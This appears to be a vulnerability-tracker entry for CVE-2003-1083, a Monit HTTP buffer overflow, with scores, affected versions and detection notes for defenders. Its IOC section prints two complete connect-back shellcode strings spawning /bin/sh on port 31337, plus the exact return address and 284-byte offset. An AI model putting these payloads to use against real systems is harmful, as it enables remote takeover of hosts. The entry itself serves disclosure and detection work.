cbcvebase.
CVE-2003-1083
published 2003-12-31

CVE-2003-1083: Stack-based buffer overflow in Monit 1.4 to 4.1 allows remote attackers to execute arbitrary code via a long HTTP request.

PriorityP355critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
21.11%
97.3th percentile
Stack-based buffer overflow in Monit 1.4 to 4.1 allows remote attackers to execute arbitrary code via a long HTTP request.

Affected

22 ranges
VendorProductVersion rangeFixed in
debianmonit< monit 1:4.2.1-1 (bookworm)monit 1:4.2.1-1 (bookworm)
tildeslashmonit
tildeslashmonit
tildeslashmonit
tildeslashmonit
tildeslashmonit
tildeslashmonit
tildeslashmonit
tildeslashmonit
tildeslashmonit
tildeslashmonit
tildeslashmonit
tildeslashmonit
tildeslashmonit
tildeslashmonit
tildeslashmonit
tildeslashmonit
tildeslashmonit
tildeslashmonit>= 0 < 1:4.2.1-11:4.2.1-1
tildeslashmonit>= 0 < 1:4.2.1-11:4.2.1-1
tildeslashmonit>= 0 < 1:4.2.1-11:4.2.1-1
tildeslashmonit>= 0 < 1:4.2.1-11:4.2.1-1

Detection & IOCsextracted from sources · hover to see the quote

port2812
port31337
bytes
\xcf\x89\xb3\x40
bytes
\x83\xC4\x40
bytes
\xeb\x74\x5d\x6a\x06\x6a\x01\x6a\x02\x8d\x1c\x24\x89\xd9\x31\xdb\xb3\x01\x31\xc0\xb0\x66\xcd\x80\x89\xc7\x83\xec\x08\x31\xc9\xc6\x04\x24\x02\x88\x4c\x24\x01\xb8\x80\xff\xff\xfe\x35\xff\xff\xff\xff\x66\xc7\x44\x24\x02\x7a\x69\x89\x44\x24\x04\x8d\x04\x24\x83\xec\x10\x89\x3c\x24\x89\x44\x24\x04\x31\xc0\xb0\x10\x89\x44\x24\x08\x31\xc0\xb0\x66\x31\xdb\xb3\x03\x8d\x14\x24\x89\xd1\xcd\x80\x85\xc0\x78\x3c\x31\xc9\x31\xc0\xb0\x3f\x89\xfb\xcd\x80\x41\x80\xf9\x02\x77\x04\xeb\xf0\xeb\x2f\x83\xec\x10\x8d\x44\x24\x08\x89\x04\x24\x31\xdb\x89\x5c\x24\x04\x89\x5c\x24\x08\x88\x5d\x07\x89\xeb\x8d\x14\x24\x89\xd1\x31\xd2\x31\xc0\xb0\x0e\x2c\x03\xcd\x80\x31\xc0\x89\xc3\x40\xcd\x80\xe8\x56\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x24
bytes
\xeb\x55\x5d\x6a\x06\x6a\x01\x6a\x02\x31\xc0\xb0\x61\x50\xcd\x80\x89\xc7\x83\xec\x08\x31\xc9\xc6\x04\x24\x02\x88\x4c\x24\x01\xb8\x80\xff\xff\xfe\x35\xff\xff\xff\xff\x66\xc7\x44\x24\x02\x7a\x69\x89\x44\x24\x04\x8d\x04\x24\x6a\x10\x50\x57\x31\xc0\xb0\x62\x50\xcd\x80\x72\x3b\x31\xc9\x51\x57\x31\xc0\xb0\x5a\x50\xcd\x80\x41\x80\xf9\x02\x77\x04\xeb\xef\xeb\x2e\x83\xec\x10\x8d\x44\x24\x08\x89\x04\x24\x31\xdb\x89\x5c\x24\x04\x89\x5c\x24\x08\x8d\x14\x24\x89\xd1\x53\x51\x88\x5d\x07\x55\x31\xc0\xb0\x3b\x50\xcd\x80\x31\xc0\x50\xfe\xc0\x50\xcd\x80\xe8\x76\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x24
  • Monit's HTTP listener on TCP/2812 is the attack surface; monitor for oversized HTTP requests (>256 bytes of payload) sent to this port, particularly those containing NOP sleds (0x90 sequences) followed by shellcode.
  • The exploit payload is terminated with a bare double newline (\n\n) rather than a well-formed HTTP request; detect HTTP traffic to port 2812 that lacks standard HTTP method/version headers but ends with \n\n.
  • The reverse shellcode connects back to the attacker on a configurable port (default 31337); monitor for unexpected outbound TCP connections from the Monit process, especially to port 31337.
  • The exploit buffer uses a fixed offset of 284 bytes before the return address overwrite; IDS signatures can match payloads to TCP/2812 containing 284+ repeated bytes followed by a 4-byte EIP value.
  • ·The return address used in exploit 1 (0x40b389cf) is specific to Mandrake 9.1 builds of Monit; the exploit for other distributions requires a different EIP value and offset, meaning signatures based solely on the hardcoded return address will miss cross-platform variants.

CVSS provenance

nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
osv10.0CRITICAL
vendor_debian10.0CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.